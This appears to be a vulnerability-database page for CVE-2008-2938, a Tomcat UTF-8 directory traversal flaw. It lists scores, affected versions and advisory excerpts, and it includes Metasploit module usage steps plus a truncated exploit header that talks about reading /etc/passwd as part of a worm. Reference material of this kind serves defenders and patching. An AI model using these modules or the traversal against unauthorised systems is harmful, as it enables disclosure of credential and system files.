Published: 13/08/2008 Updated: 25/03/2019
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 521
Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in Apache Tomcat 4.1.0 up to and including 4.1.37, 5.5.0 up to and including 5.5.26, and 6.0.0 up to and including 6.0.16, when allowLinking and UTF-8 are enabled, allows remote malicious users to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.

Affected Products

Vendor Product Versions
ApacheTomcat6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.0.8, 6.0.9, 6.0.10, 6.0.11, 6.0.12, 6.0.13, 6.0.14, 6.0.15
Apache Software FoundationTomcat6.0.16

Vendor Advisories

Synopsis Important: jbossweb security update Type/Severity Security Advisory: Important Topic An updated jbossweb package that fixes various security issues is nowavailable for JBoss Enterprise Application Platform (JBoss EAP) 42 and43This update has been rated as having important security impact by the ...
Synopsis Important: tomcat security update Type/Severity Security Advisory: Important Topic Updated tomcat packages that fix multiple security issues are now availablefor Red Hat Developer Suite 3This update has been rated as having important security impact by the RedHat Security Response Team D ...
Synopsis Low: tomcat security update for Red Hat Network Satellite Server Type/Severity Security Advisory: Low Topic Updated tomcat packages that fix multiple security issues are now availablefor Red Hat Network Satellite ServerThis update has been rated as having low security impact by the RedHat Security ...
Synopsis Important: tomcat security update Type/Severity Security Advisory: Important Topic Updated tomcat packages that fix several security issues are now availablefor Red Hat Application Server v2This update has been rated as having important security impact by the RedHat Security Response Team ...


/*Apache Tomcat < 6018 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit c0d3r: mywisdom thanks for not being lame to change exploit author tis is one of my linux w0rm module for user enumerations, i've dual os worm thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r thanks to: isa m said, ...
Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeo(bar4mi (at) gmailcom, barami (at) ahnlabcom) Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6018 Solution: - Best Choice: Upgrade to 6018 (tomcatapacheorg) - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order ...

Mailing Lists

The Oracle Containers For Java (OC4J) in the Oracle Application Server 10g suffers from a directory traversal vulnerability ...
Apache Tomcat versions prior to 6018 suffer from a directory traversal vulnerability ...
ToutVirtual VirtualIQ Pro version 32 build 7882 suffers from cross site scripting, cross site request forgery, directory traversal, and code execution vulnerabilities ...

Metasploit Modules

Tomcat UTF-8 Directory Traversal Vulnerability

This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.

msf > use auxiliary/admin/http/tomcat_utf8_traversal
      msf auxiliary(tomcat_utf8_traversal) > show actions
      msf auxiliary(tomcat_utf8_traversal) > set ACTION <action-name>
      msf auxiliary(tomcat_utf8_traversal) > show options
            ...show and set options...
      msf auxiliary(tomcat_utf8_traversal) > run
TrendMicro Data Loss Prevention 5.5 Directory Traversal

This module tests whether a directory traversal vulnerablity is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938. This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored and anonymously accessible in the passwd file.

msf > use auxiliary/admin/http/trendmicro_dlp_traversal
      msf auxiliary(trendmicro_dlp_traversal) > show actions
      msf auxiliary(trendmicro_dlp_traversal) > set ACTION <action-name>
      msf auxiliary(trendmicro_dlp_traversal) > show options
            ...show and set options...
      msf auxiliary(trendmicro_dlp_traversal) > run

Github Repositories

Offensive technologies course This repository contains descriptions of several vulnerabilities and the code that exploits them Exploitable environments can be found in /dockerfiles/victim folder Attacker environments can be found in /dockerfiles/attacker folder Everything comes as Docker images Exploited CVEs: CVE-2008-2938 (Tomcat path traversal) CVE-2014-1904 (Spring pat